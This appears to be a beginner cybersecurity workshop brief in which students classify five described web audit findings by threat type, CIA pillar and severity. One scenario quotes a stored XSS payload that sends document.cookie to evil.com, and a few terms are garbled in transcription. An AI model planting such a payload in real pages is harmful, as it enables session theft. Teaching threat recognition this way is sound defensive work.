Theoretical recap. Before diving into the workshop, let's consolidate what you have covered so far. In cybersecurity, a threat is any potential event or action that could exploit a vulnerability to cause harm to an information system. A vulnerability is a weakness in a system, application, or process that a threat actor could leverage. Risk is the combination of the likelihood of a threat occurring and the impact it would have. These three concepts form the foundation of any security analysis. The CIA triad, confidentiality, integrity, and availability, is your primary analytical lens. Confidentiality means only authorized parties can access data. Integrity means data remains accurate and unaltered by unauthorized parties. Availability means systems and data are accessible when needed. Every threat you encounter in the real world attacks at least one of these three pillars. Common web threats you have studied include phishing pages, SQL injection attempts, cross-site scripting, XSS, brute force login attempts, broken access control indicators, and exposed sensitive data. A common mistake beginners make is confusing the symptom visible on a screenshot with the root cause threat. For example, an error message revealing a database table name is a symptom. The underlying threat is SQL injection exploiting improper input validation. Always reason from what you observe toward what attack vector is being used and which CIA pillar is under threat. Keep this mental model active throughout the workshop. Workshop brief. This workshop places you in the role of a junior cybersecurity analyst who has just received a batch of screenshots captured during a web application audit. Your task is to examine each screenshot, identify the threat or attack type being illustrated, explain your reasoning, and map each finding to the relevant CIA pillars. This is a recognition and analysis exercise. Your goal is not to fix anything yet, but to demonstrate that you can read a security signal accurately and articulate what it means. You will be working with a set of 5 screenshots provided below, described textually for this workshop. Each one represents a different scenario encountered during a real-world web application review. You must treat each screenshot as a piece of evidence and produce a structured analysis for it. Screenshot descriptions. Screenshot 1, a login page showing the error message, select from users where username equals admin and password equals invalid query syntax exposed. The page returns a 500 internal server error and partially displays a stack trace including database table names. Screenshot 2, a browser address bar showing the URL, https://shop.example.com/profile, user_IAD equals 1042 and the page displaying the full account details, name, address, payment method, of another user after the tester simply changed the user_IT parameter from their own ID to 1042. Screenshot 3, a comment section on a blog application where one of the posted comments contains the text, script document.location equals https://evil.com/steal?c equals plus document.cookie/script rendered visibly in the page source, indicating the input was not sanitized. Screenshot 4, a network traffic capture, summarized as a screenshot description, showing hundreds of post requests to /login from the same IP address within 30 seconds, each with a different password value for the username admin, with no CHA or lockout mechanism triggered. Screenshot 5, an HTTP response header screenshot showing no content security policy header, no X-frame options header, server, Apache/2.2.14, Ubuntu, and X powered by PHP/5.3.2. All information visible in a standard browser developer tools panel. Steps to complete the workshop. Step 1. Read each screenshot description carefully and take notes. For each one, write down your immediate intuition about what type of threat or attack is being shown before you analyze it formally. This first impression note is part of your deliverable. Step 2. For each screenshot, produce a structured analysis block containing A. The name of the threat or attack type, B. A short explanation in your own words of how the attack works or what the screenshot reveals, C. The CIA pillars affected and why, and D. The level of severity you would assign, low, medium, high, critical, with a brief justification. Step 3. Once you have analyzed all 5 screenshots individually, write a short synthesis paragraph, 100 to 150 words, summarizing the overall security posture of this fictional application based on what you observed. Would you consider this application safe to put into production? What are the most urgent issues? Step 4. Review your own work critically. Check that you have not confused symptoms with threat types, that your CIA mapping is consistent, and that your severity ratings are justified. Adjust if necessary. Step 5. Compile your complete response into a single document, plain text, Markdown, or PDF, and submit it before the deadline. Guidance and advice. Do not rush the identification step. A screenshot that looks like a simple error message may actually be revealing a critical injection vulnerability. Slow down and ask yourself, what action caused this screen? What data is being exposed? Who could exploit this and how? If you are unsure about a threat name, go back to your previous course lessons on common web threats, the CIA Triad workshop, and the vocabulary module. You are fully allowed to consult all course materials and any reliable internet resource, OWASP, MDN, CVE databases, etc. The goal is not to memorize, it is to reason correctly. For severity ratings, use common sense aligned with real-world impact. An exposed database structure or account takeover via IDER is critical. Missing security headers are generally low to medium depending on context. Justify your choice rather than guessing. You may work alone or discuss your reasoning with peers, but the written analysis you submit must reflect your own understanding and be written in your own words.